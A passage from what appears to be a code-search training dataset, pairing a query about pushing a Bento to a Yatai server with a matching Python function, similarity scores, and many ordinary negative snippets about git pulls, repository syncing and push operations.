"def _pullchangeset(pullop):\n # We delay the open of the transaction as late as possible so we\n # don't open transaction for nothing or you break future useful\n # rollback call\n if b'changegroup' in pullop.stepsdone:\n return\n pullop.stepsdone.add(b'changegroup')\n if not pullop.fetch:\n pullop.repo.ui.status(_(b\"no changes found\\n\"))\n pullop.cgresult = 0\n return\n tr = pullop.gettransaction()\n if pullop.heads is None and list(pullop.common) == [pullop.repo.nullid]:\n pullop.repo.ui.status(_(b\"requesting all changes\\n\"))\n elif pullop.heads is None and pullop.remote.capable(b'changegroupsubset'):\n # issue1320, avoid a race if remote changed after discovery\n pullop.heads = pullop.rheads\n\n if pullop.remote.capable(b'getbundle'):\n # TODO: get bundlecaps from remote\n cg = pullop.remote.getbundle(\n b'pull', common=pullop.common, heads=pullop.heads or pullop.rheads\n )\n elif pullop.heads is None:\n with pullop.remote.commandexecutor() as e:\n cg = e.callcommand(\n b'changegroup',\n {\n b'nodes': pullop.fetch,\n b'source': b'pull',\n },\n ).result()\n\n elif not pullop.remote.capable(b'changegroupsubset'):\n raise error.Abort(\n _(\n b\"partial pull cannot be done because \"\n b\"other repository doesn't support \"\n b\"changegroupsubset.\"\n )\n )\n else:\n with pullop.remote.commandexecutor() as e:\n cg = e.callcommand(\n b'changegroupsubset',\n {\n b'bases': pullop.fetch,\n b'heads': pullop.heads,\n b'source': b'pull',\n },\n ).result()\n\n bundleop = bundle2.applybundle(\n pullop.repo, cg, tr, b'pull', pullop.remote.url()\n )\n pullop.cgresult = bundle2.combinechangegroupresults(bundleop)",
"def _pullbookmarks(pullop):\n if b'bookmarks' in pullop.stepsdone:\n return\n pullop.stepsdone.add(b'bookmarks')\n repo = pullop.repo\n remotebookmarks = pullop.remotebookmarks\n bookmod.updatefromremote(\n repo.ui,\n repo,\n remotebookmarks,\n pullop.remote.url(),\n pullop.gettransaction,\n explicit=pullop.explicitbookmarks,\n )",
"def container_pull(ctx, token, source):\n try:\n out = ctx.obj.container_pull(token, source)\n print_message(out)\n except BaseException as e:\n print_error(e.message)",
"def pull(args):\n do_all_projects(args + [\"pull\"])",
"def do_GET(self):\n f = self.send_head()\n if f:\n try:\n self.copyfile(f, self.wfile)\n finally:\n f.close()",
"def __sync_bulbs__() -> list:\n\n bulbs = list()\n\n try:\n discovered_bulbs = discover_bulbs(timeout=2)\n except Exception as e:\n raise Exception(str(e))\n\n for bulb in discovered_bulbs:\n ip = bulb['ip']\n port = bulb['port']\n model = bulb['capabilities']['model']\n name = bulb['capabilities']['name']\n name = name if name != '' else ip\n identifier = bulb['capabilities']['id']\n\n found_bulb = Bulb(\n ip=ip,\n port=port,\n model=model\n )\n\n found_bulb.set_name(name)\n properties = found_bulb.get_properties()\n\n bulbs.append({\n 'bulb': found_bulb,\n 'name': name,\n 'model': model,\n 'ip': ip,\n 'metadata':\n {\n 'id': identifier,\n 'ip': ip,\n 'name': name,\n 'model': model,\n 'properties': properties\n }\n })\n\n return bulbs",
"def pull(self, pull: Optional[int] = None) -> Optional[int]:\n ...",
"def query_bot(self):\n tmp = os.path.join(self._tmpdir, 'bots.json')\n args = [\n '-json',\n tmp,\n ]\n ret = self._run_swarming('bots', args)\n assert ret == 0, 'Failed to fetch bots. exit_code=%d' % ret\n with open(tmp, 'rb') as f:\n bots = json.load(f)\n if not bots:\n return\n return bots[0]",
"def get(self, id):\n return self.__get_object(super(PullRequests, self).get(id))",
"def checkout_latest():\n with cd(env.repo_path):\n run('git checkout %(branch)s;' % env)\n run('git pull origin %(branch)s' % env)",
"def pull(ctx, path_base):\n with ctx.cd(path_base):\n ctx.run('git reset --hard')\n ctx.run('git pull origin master')",
"def fpull(var, wrapper, message):\n _git_pull(wrapper)",
"async def _brawlcord(self, ctx: Context):\n\n from .brawlcord import __version__\n\n info = (\n \"Brawlcord is a Discord bot which allows users to simulate\"\n f\" a simple version of [Brawl Stars]({BRAWLSTARS}), a mobile\"\n f\" game developed by Supercell. \\n\\nBrawlcord has features\"\n \" such as interactive 1v1 Brawls, diverse Brawlers and\"\n \" leaderboards! You can suggest more features in [the community\"\n f\" server]({COMMUNITY_SERVER})!\\n\\n{ctx.me.name} is currently in\"\n f\" **{len(self.bot.guilds)}** servers!\"\n )\n\n disclaimer = (\n \"This content is not affiliated with, endorsed, sponsored,\"\n \" or specifically approved by Supercell and Supercell is\"\n \" not responsible for it. For more information see Supercell’s\"\n f\" [Fan Content Policy]({FAN_CONTENT_POLICY}).\"\n )\n\n embed = discord.Embed(color=EMBED_COLOR)\n\n embed.add_field(name=\"About Brawlcord\", value=info, inline=False)\n\n embed.add_field(name=\"Creator\", value=f\"[Snowsee]({REDDIT_LINK})\")\n\n page = urllib.request.urlopen(BRAWLCORD_CODE_URL)\n\n text = page.read()\n\n version_str = f\"[{__version__}]({SOURCE_LINK})\"\n\n match = re.search(\"__version__ = \\\"(.+)\\\"\", text.decode(\"utf-8\"))\n\n if match:\n current_ver = match.group(1)\n if LooseVersion(current_ver) > LooseVersion(__version__):\n version_str += f\" ({current_ver} is available!)\"\n\n embed.add_field(name=\"Version\", value=version_str)\n\n embed.add_field(name=\"Invite Link\",\n value=f\"[Click here]({INVITE_URL})\")\n\n embed.add_field(\n name=\"Feedback\",\n value=(\n f\"You can give feedback to improve Brawlcord in\"\n f\" [the community server]({COMMUNITY_SERVER}).\"\n ),\n inline=False\n )\n\n embed.add_field(name=\"Disclaimer\", value=disclaimer, inline=False)\n\n try:\n await ctx.send(embed=embed)\n except discord.Forbidden:\n return await ctx.send(\n \"I do not have the permission to embed a link.\"\n \" Please give/ask someone to give me that permission.\"\n )",
"async def pull(ctx, pip=None):\n dev = ctx.message.author\n if bot.botdev_role in dev.roles or bot.owner_role in dev.roles:\n await ctx.send(\"`Pulling changes...`\")\n call([\"git\", \"stash\", \"save\"])\n call([\"git\", \"pull\"])\n call([\"git\", \"stash\", \"clear\"])\n pip_text = \"\"\n if pip == \"-p\" or pip == \"--pip\" or pip == \"-Syu\":\n await ctx.send(\"`Updating python dependencies...`\")\n call([\"python3.6\", \"-m\", \"pip\", \"install\", \"--user\", \"--upgrade\", \"-r\",\n \"requirements.txt\"])\n pip_text = \" and updated python dependencies\"\n await ctx.send(\"Pulled changes{}! Restarting...\".format(pip_text))\n call([\"python3.6\", \"SchmuckBot.py\"])\n else:\n if \"pacman\" in ctx.message.content:\n await ctx.send(\"`{} is not in the sudoers file. This incident will be reported.`\".format(ctx.message.author.display_name))\n else:\n await ctx.send(\"Only bot devs and / or owners can use this command\")",
"def syncpull(repo, remote, gettransaction):\n tr = None\n if _enabled:\n repo.ui.debug('fetching remote obsolete markers\\n')\n remoteobs = remote.listkeys('obsolete')\n if 'dump0' in remoteobs:\n tr = gettransaction()\n for key in sorted(remoteobs, reverse=True):\n if key.startswith('dump'):\n data = base85.b85decode(remoteobs[key])\n repo.obsstore.mergemarkers(tr, data)\n repo.invalidatevolatilesets()\n return tr",
"def do_GET(self):\n server_ip = Setup.parse_options()['ip_address']\n uri = \"http://\" + server_ip + self.path\n response = urllib.urlopen(uri)\n self.copyfile(response, self.wfile)\n headers = self.generate_header_dic(self.headers.headers)\n ip_address = self.client_address[0] # get client iP address\n if Setup.system_status != 'green':\n self.process_request(ip_address, headers, self.path)\n self.process_response(ip_address, response.headers)",
"def fetch(self):\n if self.host.filesystem.exists(self.path):\n _log.info('WPT checkout exists at %s, fetching latest', self.path)\n self.run(['git', 'fetch', 'origin'])\n self.run(['git', 'reset', '--hard', 'origin/master'])\n return\n\n _log.info('Cloning GitHub web-platform-tests/wpt into %s', self.path)\n if self.gh_token:\n remote_url = WPT_GH_SSH_URL_TEMPLATE.format(self.gh_token)\n else:\n remote_url = WPT_MIRROR_URL\n _log.info('No credentials given, using wpt mirror URL.')\n _log.info(\n 'It is possible for the mirror to be delayed; see https://crbug.com/698272.'\n )\n # Do not use self.run here because self.path doesn't exist yet.\n self.host.executive.run_command(\n ['git', 'clone', remote_url, self.path])\n\n _log.info('Setting git user name & email in %s', self.path)\n self.run(['git', 'config', 'user.name', DEFAULT_WPT_COMMITTER_NAME])\n self.run(['git', 'config', 'user.email', DEFAULT_WPT_COMMITTER_EMAIL])",
"def __init__(self):\n self.api = TodoistAPI(API_KEY)\n self.api.sync()",
"def shift_server():\n global ALIVE\n if ALIVE == 0:\n ALIVE = 1\n elif ALIVE == 1:\n ALIVE = 0\n channel = grpc.insecure_channel(PORTS[ALIVE])\n stub = dist_bank_pb2_grpc.DistBankStub(channel)\n return stub",
"def pull(browser):\n fetched = 0\n table = browser.get_template_table()\n\n print('Checking all letters for changes...')\n for letter in table.rows:\n letter.console_msg()\n if letter.remote_modified():\n old_chk = letter.checksum\n letter.pull()\n if old_chk is None:\n letter.console_msg('fetched new letter @ {}'.format(letter.checksum[0:7]))\n else:\n letter.console_msg('updated from {} to {}'.format(old_chk[0:7], letter.checksum[0:7]))\n fetched += 1\n else:\n letter.console_msg('no changes')\n\n sys.stdout.write('\\n')\n\n sys.stdout.write(Fore.GREEN + '{} of {} files contained new modifications\\n'.format(fetched, len(table.rows)) + Style.RESET_ALL)\n\n # status['last_pull_date'] = datetime.now()\n table.status.save()",
"def PullTasmotaConfig(host, port, username=DEFAULTS['source']['username'], password=None):\n _, body = TasmotaGet('dl', host, port, username, password, contenttype='application/octet-stream')\n\n return body",
"def _load(self):\n\n context = {\n \"username\": self.username,\n \"reponame\": self.reponame,\n \"name\": self.name\n }\n LOG.debug(\"Loading %s\" % self.branch_id)\n doc = self._client.getjson(path=\"/users/%(username)s/repos/%(reponame)s\"\n \"/branches/%(name)s\" % context)\n LOG.debug(\"doc loaded: %r\" % doc)\n slice_id = \"%(username)s/%(reponame)s/%(slice_id)s\" % {\n \"username\": self.username,\n \"reponame\": self.reponame,\n \"slice_id\": doc[\"slice_id\"]\n }\n self._slice = self._client.slice(slice_id)\n self._packages = doc[\"packages\"]",
"def git_pull():\n\n puts(yellow(\"Pull master from GitHub\"))\n with cd(env.source_dir):\n run('git reset --hard HEAD')\n run('git pull')",
"def test_get_boat(self):\n pass",
"def __fetch_remote_source(self):\n # type: () -> Union(Git, None)\n if self.source == 'git':\n return self.git_source_class(**self.configuration).fetch()\n return None",
"def pull(release):\n image = f\"breqwatr/rsyslog:{release}\"\n ecr.pull(image)"
] | [
"0.6253494",
"0.61232203",
"0.59411526",
"0.5814772",
"0.5765839",
"0.5646557",
"0.55963373",
"0.55957717",
"0.5572075",
"0.55645216",
"0.5557959",
"0.5454153",
"0.5417521",
"0.54132676",
"0.5413063",
"0.53649527",
"0.5361535",
"0.5349794",
"0.53326946",
"0.53325665",
"0.5319298",
"0.53111213",
"0.5273583",
"0.5221559",
"0.52046984",
"0.51962155",
"0.5192047",
"0.51849926",
"0.5144103",
"0.5126676",
"0.510129",
"0.5048991",
"0.50451934",
"0.5041838",
"0.50309366",
"0.501729",
"0.5013243",
"0.50073",
"0.49940103",
"0.49790677",
"0.49786046",
"0.49713257",
"0.49710426",
"0.49695373",
"0.49151093",
"0.49012133",
"0.48977458",
"0.4878724",
"0.48607787",
"0.4832093",
"0.4826335",
"0.48230666",
"0.4813698",
"0.47944596",
"0.47944596",
"0.47943652",
"0.47922963",
"0.4780897",
"0.47609752",
"0.47556618",
"0.4743114",
"0.4741002",
"0.47119883",
"0.47073004",
"0.47027755",
"0.46979165",
"0.46957064",
"0.4687686",
"0.46816927",
"0.4678992",
"0.46723768",
"0.46672088",
"0.46574214",
"0.46569642",
"0.46569583",
"0.4645533",
"0.46416372",
"0.46413764",
"0.46396995",
"0.4630324",
"0.46250108",
"0.46210063",
"0.46183068",
"0.46181923",
"0.46171457",
"0.46161777",
"0.4615168",
"0.46140647",
"0.46134996",
"0.4602909",
"0.45954016",
"0.45929688",
"0.45786077",
"0.4576626",
"0.45751002",
"0.45744494",
"0.4573463",
"0.45540816",
"0.45534822",
"0.45419338"
] | 0.72192776 | 0 |
Push Bento to a yatai server. | def push(bento_tag: str, force: bool, threads: int) -> None: # type: ignore (not accessed)
bento_obj = bento_store.get(bento_tag)
if not bento_obj:
raise click.ClickException(f"Bento {bento_tag} not found in local store")
yatai_client.push_bento(bento_obj, force=force, threads=threads) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _push_to_server(self) -> None:\n pass",
"def push(self, *args, **kwargs):\n pass",
"def push(self, obj):\n pass",
"def remote_push(self, pNamespace):",
"def push(self):\n origin = self.git_repo.remotes.origin\n origin.push()",
"def _push(self):\n push_cmds = self.vcs.push_commands()\n if not push_cmds:\n return\n if utils.ask(\"OK to push commits to the server?\"):\n for push_cmd in push_cmds:\n output = execute_command(push_cmd)\n logger.info(output)",
"def push(self):\n out, err, code = self.command( [\"git\", \"push\"], self.directory )",
"def push(self, obj):\r\n request = http.Request('POST', self.get_push_url(), obj)\r\n return request, parsers.parse_json",
"def push():\n branch = git.current_branch().name\n shell.run('git push -u origin {}'.format(branch))",
"def push():\n local('hg push jvacx')",
"def push_data(self, data):\n self.incoming.write(data)",
"def push(ctx):\n dufl_root = ctx.obj['dufl_root']\n git = Git(ctx.obj.get('git', '/usr/bin/git'), dufl_root)\n git.run('push', 'origin', git.working_branch())",
"def to_server(self, o):\n assert type(o) == str\n\n # add to queue\n self.toserverqueue.put(o, block=False)\n\n # send now, if appropriate\n if self.buffer_tx==False:\n self.periodicTimer.fireNow()",
"def push(self):\n return False",
"def push(self, remote, branch, *args):\n return self.cmd('push', remote, branch, *args)",
"def push(self, command):\n \n if len(command) > 1: \n if p.location == a.location:\n for item in p.location.objects:\n if command[1] == item.name:\n item.location.objects.remove(a)\n item.location = seven \n seven.objects.append(a)\n print('You pushed ' + item.name + '!')\n else:\n print(\"Push who?\")",
"def push(self):\n if self.forward:\n git = self.repo.git\n try:\n git.push()\n self.forward = \"pushed\"\n except:\n self.forward = \"push error - \"+self.forward",
"def __gitPush(self):\n self.vcs.gitPush(self.project.getProjectPath())",
"def push(self, item: Any) -> None:\n # TODO: Implement this method\n ...",
"def push_write(self, s):\n ...",
"def push ():\n\n tagname = get_tag (comp_versions, 'ACE')\n\n if opts.push:\n if opts.take_action:\n vprint (\"Pushing ACE_TAO\", opts.ace_tao_branch, \"to origin\")\n ex (\"cd $DOC_ROOT/ACE_TAO && git push origin \" + opts.ace_tao_branch)\n\n vprint (\"Pushing tag %s on ACE_TAO\" % (tagname))\n ex (\"cd $DOC_ROOT/ACE_TAO && git push origin tag \" + tagname)\n\n vprint (\"Pushing tag %s on MPC\" % (tagname))\n ex (\"cd $DOC_ROOT/MPC && git push origin tag \" + tagname)\n\n # Push release branches\n latest_branch_helper (push_latest_branch, opts.release_type)\n else:\n vprint (\"Pushing tag %s on ACE_TAO\" % (tagname))\n vprint (\"Pushing tag %s on MPC\" % (tagname))\n print (\"Pushing tags:\\n\")\n print (\"Pushing tag \" + tagname + \"\\n\")",
"def push(self, **kwargs):\n return _taskpipeoperation(self,'push', **kwargs)",
"def push(self, x):\n self.queue[self.tag].put(x)",
"def push(self):\n self.stack.append(self.save())",
"def push(self, item):\n pass",
"def push(self, *args, **kwargs):\n self.queue.put((args, kwargs))",
"def push_commits(self, verbose=True):\n # The subprocess will return a non-zero exit code even if it succeeded.\n # Check its output to determine whether it worked.\n push_proc = subprocess.run(\n [\"git\", \"push\"],\n cwd=self.path,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True,\n )\n if \"updated in conservator\" not in push_proc.stdout:\n if \"Everything up-to-date\" in push_proc.stdout:\n logger.warning(push_proc.stdout)\n else:\n logger.error(\n \"Server did not accept changes to index.json:\\n%s\", push_proc.stdout\n )\n raise RuntimeError(\"Failed to push changes to index.json\")\n self.pull(verbose)",
"def d_ploy():\n\tlocal(\"git push origin --all\")\n\twith cd(LIVE_ROOT):\n\t\trun(\"git pull\")",
"def post(self):\n text = 'HELLO from socnet API Server!'\n return push_to_mattermost(text)",
"def push(args):\n if args.type == 'ssh':\n cache = set(args.remote_cache).union(set(args.cache))\n for path in sorted(cache):\n if os.path.exists(os.path.join(args.base, path)) and not remote_exists(args.sftp, os.path.join(args.remote_base, path)):\n print('push: {}'.format(path))\n ensure_remote(args.sftp, os.path.dirname(os.path.join(args.remote_base, path)))\n args.sftp.put(\n os.path.join(args.base, path),\n os.path.join(args.remote_base, path)\n )\n args.remote_cache.append(path)\n args.remote_update = True\n elif args.type == 's3':\n raise NotImplementedError('s3:// remote type not yet supported!')\n elif args.type == 'gs':\n raise NotImplementedError('gs:// remote type not yet supported!')\n return",
"def push(self, request):\n serializer = PushTestSerializer(data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'success': True}, status=status.HTTP_201_CREATED)",
"def push(self):\n data = {self._build_key(key): value for key, value in self.motions.items()}\n DataManager.control.update(data)",
"def push(targets, **namespace):",
"def push(self, data):\n node = OneWayNode(data)\n self.__head = node\n node.set_next(self.__head)\n self.__size += 1",
"def push(self, x):\r\n self.queue.append(x)\r\n self.topele = x\r\n self.num+=1",
"def push(keys: List[str]):\n api = API()\n api.push(*keys)",
"def infocalypse_push(ui_, repo, **opts):\n params, stored_cfg = get_config_info(ui_, opts)\n insert_uri = opts['uri']\n if insert_uri == '':\n insert_uri = stored_cfg.get_dir_insert_uri(repo.root)\n if not insert_uri:\n ui_.warn(\"There is no stored insert URI for this repo.\\n\"\n \"Please set one with the --uri option.\\n\")\n return\n\n set_target_version(ui_, repo, opts, params,\n \"Only pushing to version(s): %s\\n\")\n params['INSERT_URI'] = insert_uri\n #if opts['requesturi'] != '':\n # # DOESN'T search the insert uri index.\n # ui_.status((\"Copying from:\\n%s\\nTo:\\n%s\\n\\nThis is an \"\n # + \"advanced feature. \"\n # + \"I hope you know what you're doing.\\n\") %\n # (opts['requesturi'], insert_uri))\n # params['REQUEST_URI'] = opts['requesturi']\n\n execute_push(ui_, repo, params, stored_cfg)",
"def push(self, x):\r\n self.queue.append(x)",
"def _push(self, server):\n defns = [self.get_id(ident) for ident in list(self.ids)]\n #for ident in list(self.ids):\n # defn = self.get_id(ident)\n if len(defns) == 0:\n return\n self.app.logger.info(f\"Updating {server} with {len(defns)} records\")\n url = f\"{server}/add_record\"\n try:\n resp = requests.post(url, json=defns)\n except Exception as e:\n self.app.logger.error(str(e))\n return\n if not resp.ok:\n self.app.logger.error(f\"{resp.reason} {resp.content}\")\n return\n self._server_updated[server] = True",
"def dispatch_push(self, p, tweaks, badge):\n pass",
"async def fancysay(self, ctx):",
"def push(self, value):\n self.history.append(value)",
"def sendBuffer():\n dislin.sendbf()",
"def ship():\n cotton.git_push()\n cotton.install_python_dependencies()\n\n # Deploy the secrets module to the remote project root\n spath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'secrets'))\n put(spath, env.project_root)\n\n cotton.upload_template_and_reload('cron')",
"def push(self, x):\n self.queue.insert(0, x)",
"def push(self, x):\n self.queue.insert(0, x)",
"def push(self, item: T) -> None:\n pass",
"def push(self) -> None:\n\n with ImportExtensions(required=True):\n import requests\n\n pkg_path = Path(self.args.path)\n if not pkg_path.exists():\n self.logger.critical(f'`{self.args.path}` is not a valid path!')\n exit(1)\n\n request_headers = self._get_request_header()\n\n try:\n # archive the executor package\n with TimeContext(f'Packaging {self.args.path}', self.logger):\n md5_hash = hashlib.md5()\n bytesio = archive_package(pkg_path)\n content = bytesio.getvalue()\n md5_hash.update(content)\n\n md5_digest = md5_hash.hexdigest()\n\n # upload the archived package\n form_data = {\n 'public': self.args.public if hasattr(self.args, 'public') else False,\n 'private': self.args.private\n if hasattr(self.args, 'private')\n else False,\n 'md5sum': md5_digest,\n 'force': self.args.force,\n 'secret': self.args.secret,\n }\n\n method = 'put' if self.args.force else 'post'\n\n hubble_url = get_hubble_url()\n # upload the archived executor to Jina Hub\n with TimeContext(\n f'Pushing to {hubble_url} ({method.upper()})',\n self.logger,\n ):\n resp = getattr(requests, method)(\n hubble_url,\n files={'file': content},\n data=form_data,\n headers=request_headers,\n )\n\n if 200 <= resp.status_code < 300:\n # TODO: only support single executor now\n image = resp.json()['executors'][0]\n\n uuid8 = image['id']\n secret = image['secret']\n visibility = image['visibility']\n\n info_table = [\n f'\\t🔑 ID:\\t\\t' + colored(f'{uuid8}', 'cyan'),\n f'\\t🔒 Secret:\\t'\n + colored(\n f'{secret}',\n 'cyan',\n )\n + colored(\n ' (👈 Please store this secret carefully, it wont show up again)',\n 'red',\n ),\n f'\\t👀 Visibility:\\t' + colored(f'{visibility}', 'cyan'),\n ]\n\n if 'alias' in image:\n info_table.append(f'\\t📛 Alias:\\t' + colored(image['alias'], 'cyan'))\n\n self.logger.success(f'🎉 Executor `{pkg_path}` is pushed successfully!')\n self.logger.info('\\n' + '\\n'.join(info_table))\n\n usage = (\n f'jinahub://{uuid8}'\n if visibility == 'public'\n else f'jinahub://{uuid8}:{secret}'\n )\n\n self.logger.info(f'You can use it via `uses={usage}` in the Flow/CLI.')\n elif resp.text:\n # NOTE: sometimes resp.text returns empty\n raise Exception(resp.text)\n else:\n resp.raise_for_status()\n except Exception as e: # IO related errors\n self.logger.error(\n f'Error while pushing `{self.args.path}` with session_id={request_headers[\"jinameta-session-id\"]}: '\n f'\\n{e!r}'\n )",
"def event_player_push(self) -> None:\n print(f\"You got a push, your bet of {self.user.bet} is returned\")",
"def on_push(self, data):\n if data[\"type\"] == \"push\":\n self._data = data[\"push\"]",
"def add(self, bento_name, bento_version):",
"def push(self, x):\n self.mystack1.append(x)\n # print(self.mystack1)",
"def push(self, item):\n self._pushed.append(item)",
"def push(self, value: object) -> None:\n self._data.append(value)",
"def push(self, value: object) -> None:\n self._data.append(value)",
"def _push_from_buffer(self):\r\n if len(self.buffer) > 0:\r\n if time.time() - self.last_sent_time > 5:\r\n try:\r\n message = self.buffer.pop(0)\r\n self._send_now(message)\r\n finally:\r\n self.last_sent_time = time.time()",
"def push(self):\n result = self.get_result_dict()\n headers = {\n 'Authorization': self.token\n }\n response = requests.post(\n url, json=json.dumps(result, indent=4), headers=headers\n )\n return response.json()",
"def call_git_push():\n print(\"This will commit and push the git repo\")\n today = datetime.datetime.today()\n call([\"git\", \"add\", \".\"])\n call([\"git\", \"commit\", \"-m\", \"Updated notes. {:%Y-%m-%d %H:%M:%S}\".format(today)])\n call([\"git\", \"push\", \"origin\", \"master\"])",
"def push(self, x):",
"def push(self, x):\n self.queue.insert(len(self.queue), x)",
"def _got_remote(self, data):\n self._recv_buffer += data",
"def push(self, x):\r\n # 队列的push操作\r\n self.stack.append(x)",
"def push_updates():\n check_call(['git', 'push', '--tags', '--force'])",
"def send_message_to_server(self, key, value):\n if self.from_kivy_queue is None:\n return\n self.from_kivy_queue.put((key, value))",
"def push(event):\n _pushedEvents.append(event)",
"def send_message_to_server(self, new_element):\n self._current_list.append(new_element)\n print(\"Enviando... {}\".format(self._current_list))\n final_content = dumps(self._current_list)\n self._socket.send(final_content)",
"def push(self, data):\n self._list.append(data)",
"def push(images, tag, registry):\n manager = Manager('push', tag, images=images, registry_url=registry)\n manager.run()",
"def do_push(self, remote, branch, force=False, force_with_lease=False, remote_branch=None):\n if self.savvy_settings.get(\"confirm_force_push\", True):\n if force:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force\")):\n return\n elif force_with_lease:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force--with-lease\")):\n return\n\n self.window.status_message(START_PUSH_MESSAGE)\n self.push(\n remote,\n branch,\n set_upstream=self.set_upstream,\n force=force,\n force_with_lease=force_with_lease,\n remote_branch=remote_branch\n )\n self.window.status_message(END_PUSH_MESSAGE)\n util.view.refresh_gitsavvy(self.window.active_view())",
"def push(self, x):\n self.queue1.append(x)",
"def push(self, base_repo, branch=\"master\"):\n base_repo.push_to(self, branch)",
"def transmit_to_server(self):\n # If a server argument was not given then exit the program\n self.channel.basic_publish(exchange='', routing_key='bt_wardrive', body=self.capture,\n properties=pika.BasicProperties(delivery_mode=2))",
"def push_updates(update_alias, config, path_or_url):\n api = get_packit_api(config=config, local_project=path_or_url)\n api.push_updates(update_alias)",
"def deploy():\n build()\n collect()\n commit()\n push()",
"def push(repo_host, user='debrepo', verbose=False):\n # input stream: deb file paths\n # convert this to cpio stream\n cpio=Popen(['/bin/cpio', '-o'], stdout=PIPE)\n\n # push to the other end\n user_host='{user}@{repo_host}'.format(user=user, repo_host=repo_host)\n cmd=['/usr/bin/ssh', user_host, 'debhelper.py', 'receive']\n if verbose:\n print(' '.join(cmd))\n\n push=Popen(cmd, stdin=cpio.stdout)\n\n sys.exit(push.wait())",
"def push(host):\n dispatcher = Dispatch(host)\n\n post(host)\n\n context = zmq.Context()\n zmq_socket = context.socket(zmq.PUSH)\n zmq_socket.bind('tcp://127.0.0.1:5560')\n\n for record in dispatcher:\n zmq_socket.send_pyobj((int(time.time()),record.raw))",
"def do_push(self, line):\n self.review.push()\n return True",
"def callback(address, queue, data):\n queue.put(bytes('ACK', 'utf8'))\n self._server_in_buf.append(data)",
"def git_push(c):\n c.run(\"git submodule foreach git push \")",
"def callback(address, queue, data):\n\t\t\tqueue.put(bytes('ACK', 'utf8'))\n\t\t\tself._server_in_buf.append(data)",
"def do_push( sliver_hosts, portnum, payload ):\n \n global TESTING, CONFIG\n \n from gevent import monkey\n \n if TESTING:\n monkey.patch_all()\n \n else:\n # make gevents runnabale from multiple threads (or Django will complain)\n monkey.patch_all(socket=True, dns=True, time=True, select=True, thread=False, os=True, ssl=True, httplib=False, aggressive=True)\n \n import grequests\n \n # fan-out \n requests = []\n for sh in sliver_hosts:\n rs = grequests.post( \"http://\" + sh + \":\" + str(portnum), data={\"observer_message\": payload}, timeout=getattr(CONFIG, \"SYNDICATE_HTTP_PUSH_TIMEOUT\", 60) )\n requests.append( rs )\n \n # fan-in\n responses = grequests.map( requests )\n \n assert len(responses) == len(requests), \"grequests error: len(responses) != len(requests)\"\n \n for i in xrange(0,len(requests)):\n resp = responses[i]\n req = requests[i]\n \n if resp is None:\n logger.error(\"Failed to connect to %s\" % (req.url))\n continue \n \n # verify they all worked \n if resp.status_code != 200:\n logger.error(\"Failed to POST to %s, status code = %s\" % (resp.url, resp.status_code))\n continue\n \n return True",
"def push(self, item: Any) -> None:\n self._data.append(item)",
"def pushAll(**namespace):",
"def push(self, value):\n raise NotImplementedError",
"def push(self):\n self.runtime.logger.info('Pushing config...')\n with Dir(self.runtime.metadata_dir):\n exectools.cmd_assert([\"git\", \"push\"])",
"def _push_to_server(self) -> None:\n if not self.url or not self.job_name:\n return\n\n try:\n pushadd_to_gateway(self.url, job=self.job_name, registry=REGISTRY, handler=self._auth_handler)\n\n except OSError as exp:\n self.logger.warning(\"Failed to push metrics to %s: %s\", self.url, str(exp))\n except:\n self.logger.exception(\"Failed to push metrics to %s\", self.url)\n\n self.logger.debug(\"Pushed metrics to %s\", self.url)",
"def push(target):\n if target is None:\n target = getcwd()\n\n target = path.abspath(target)\n\n dot_chunk = load_chunk(target)\n src = dot_chunk[\"src\"]\n source = load_source(src)\n\n copy(target, source)",
"def syncpush(repo, remote):\n if (_enabled and repo.obsstore and\n 'obsolete' in remote.listkeys('namespaces')):\n rslts = []\n remotedata = repo.listkeys('obsolete')\n for key in sorted(remotedata, reverse=True):\n # reverse sort to ensure we end with dump0\n data = remotedata[key]\n rslts.append(remote.pushkey('obsolete', key, '', data))\n if [r for r in rslts if not r]:\n msg = _('failed to push some obsolete markers!\\n')\n repo.ui.warn(msg)",
"def push(self, points, database):\n params = urllib.urlencode(\n {'db': database, 'u': self.user, 'p': self.password, 'precision': 's'}\n )\n\n stamp = int(time.time())\n for point in points:\n if not point.time:\n point.time = stamp\n\n while points:\n body = '\\n'.join(p.serialize() for p in points[:100])\n points = points[100:]\n for attempt in range(5):\n if attempt:\n time.sleep(2 ** (attempt - 1))\n\n try:\n conn = httplib.HTTPConnection(self.host_port)\n conn.request('POST', '%s/write?%s' % (self.path, params), body)\n resp = conn.getresponse()\n except httplib.HTTPException:\n print >>sys.stderr, (\n 'Exception POSTing influx points to: %s\\n%s'\n % (self.host_port, traceback.format_exc())\n )\n continue\n if resp.status >= 500:\n continue\n if resp.status >= 400:\n raise Error(\n 'Error writing InfluxDB points (attempt #%d, status code %d): %s'\n % (attempt, resp.status, resp.read())\n )\n break\n else:\n raise Error(\n 'Failed to write InfluxDB points with %d attempts. (status code %d): %s'\n % (attempt, resp.status, resp.read())\n )",
"def pull(bento_tag: str, force: bool) -> None: # type: ignore (not accessed)\n yatai_client.pull_bento(bento_tag, force=force)",
"def push_application(self):\n raise NotImplementedError()",
"def send(self, repo_id, action, *args):\n self.queue.put({'repo_id': repo_id, 'action': action, 'data': args})\n self.callback(repo_id, action, *args)",
"def make_push(db,product_name, date, product_number, product_price, url):\n if db.product_mstator.find({'url':url}).count()==0:\n push = {\n \"product_name\": product_name,\n \"date\": [date],\n 'product_number': [product_number],\n 'product_price': [product_price],\n 'url': url\n }\n db.product_mstator.insert_one(push)\n else:\n db.product_mstator.update_one({'url':url},{'$push': {\n 'date':date,\n 'product_number':product_number,\n 'product_price':product_price\n }})\n return None",
"def push(self, data):\r\n return bass_call_0(BASS_StreamPutData, self.handle, data, len(data))",
"def push(self, item) -> None:\n self.items.append(item)",
"def push_queue(self, url):\n self.sqs_client.send_message(\n QueueUrl=self.sqs_queue,\n MessageBody=url,\n )",
